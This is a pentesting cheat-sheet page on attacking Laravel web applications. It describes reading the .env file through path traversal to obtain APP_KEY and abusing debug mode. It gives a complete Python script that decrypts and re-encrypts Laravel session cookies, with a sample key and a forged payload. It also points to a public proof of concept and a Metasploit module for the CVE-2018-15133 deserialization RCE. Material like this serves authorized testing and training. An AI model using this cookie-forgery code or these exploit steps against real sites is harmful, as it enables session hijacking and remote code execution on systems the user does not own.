HackTricks
Search…
Pentesting
Powered By GitBook
Laravel

Laravel Tricks

Debugging mode

If Laravel is in debugging mode you will be able to access the code and sensitive data. For example http://127.0.0.1:8000/profiles:
This is usually needed for exploiting other Laravel RCE CVEs.

.env

Laravel saves the APP it uses to encrypt the cookies and other credentials inside a file called .env that can be accessed using some path traversal under: /../.env
Laravel will also show this information inside the debug page (that appears when Laravel finds an error and it's activated).
Using the secret APP_KEY of Laravel you can decrypt and re-encrypt cookies:
1
import os
2
import json
3
import hashlib
4
import sys
5
import hmac
6
import base64
7
import string
8
import requests
9
from Crypto.Cipher import AES
10
from phpserialize import loads, dumps
11
12
#https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3
13
14
def mcrypt_decrypt(value, iv):
15
global key
16
AES.key_size = 128
17
crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
18
return crypt_object.decrypt(value)
19
20
21
def mcrypt_encrypt(value, iv):
22
global key
23
AES.key_size = 128
24
crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
25
return crypt_object.encrypt(value)
26
27
28
def decrypt(bstring):
29
global key
30
dic = json.loads(base64.b64decode(bstring).decode())
31
mac = dic['mac']
32
value = bytes(dic['value'], 'utf-8')
33
iv = bytes(dic['iv'], 'utf-8')
34
if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
35
return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
36
#return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
37
return ''
38
39
40
def encrypt(string):
41
global key
42
iv = os.urandom(16)
43
#string = dumps(string)
44
padding = 16 - len(string) % 16
45
string += bytes(chr(padding) * padding, 'utf-8')
46
value = base64.b64encode(mcrypt_encrypt(string, iv))
47
iv = base64.b64encode(iv)
48
mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
49
dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
50
return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))
51
52
app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='
53
key = base64.b64decode(app_key)
54
decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlhcL1JGY0t6YzhaaGNHR1duSktIdjF1elwvNXhrd1Q4SVlXMzBrbTV0MWk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9')
55
#b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'
56
encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}')
57
Copied!

Laravel Deserialization RCE

Vulnerable versions: 5.5.40 and 5.6.x through 5.6.29 (https://www.cvedetails.com/cve/CVE-2018-15133/)
Here you can find information about the deserialization vulnerability here: https://labs.f-secure.com/archive/laravel-cookie-forgery-decryption-and-rce/
You can test and exploit it using https://github.com/kozmic/laravel-poc-CVE-2018-15133 Or you can also exploit it with metasploit: use unix/http/laravel_token_unserialize_exec

CVE-2021-3129

Laravel SQLInjection

Last modified 1mo ago